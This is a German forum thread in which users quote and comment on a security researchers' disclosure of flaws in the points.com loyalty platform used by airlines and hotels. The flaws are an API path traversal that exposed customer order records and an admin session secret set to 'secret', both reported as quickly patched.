IT-Security-Probleme bei Miles & More, Hilton, Marriott, IHG, FFPs von DL, EK, SQ, UA, EY, AC, CX, …

[qube]

ANZEIGE

Leaked Secrets and Unlimited Miles: Hacking the Largest Airline and Hotel Rewards Platform

Es geht los mit

Our first report was an unauthenticated HTTP path traversal allowing access to an internal API which would’ve allowed an attacker to query entries from a set of 22 million order records. The data within the records included partial credit card numbers, home addresses, email addresses, phone numbers, reward points numbers, customer authorization tokens, and miscellaneous transaction details. This information could be queried through an API call that returned one-hundred results per HTTP request. By appending optional sorting parameters, an attacker could enumerate the data or query for specific information (e.g. searching a customer's name or email address).

und wird noch deutlich bunter.

 

[Arnuntar]

Die haben allen ernstes das Wort "secret" als Passwort zum Signieren von Tokens benutzt ?

On May 2nd, 2023, we identified that the Flask session secret for the points.com global administration website used to manage all airline tenant and customer accounts was the word “secret”. After discovering this vulnerability, we were able to resign our session cookies with full super administrator permissions.

Zumindest haben die wohl schnell reagiert:

We had reported all issues to the points.com security team who very quickly patched them and worked with us in creating this disclosure.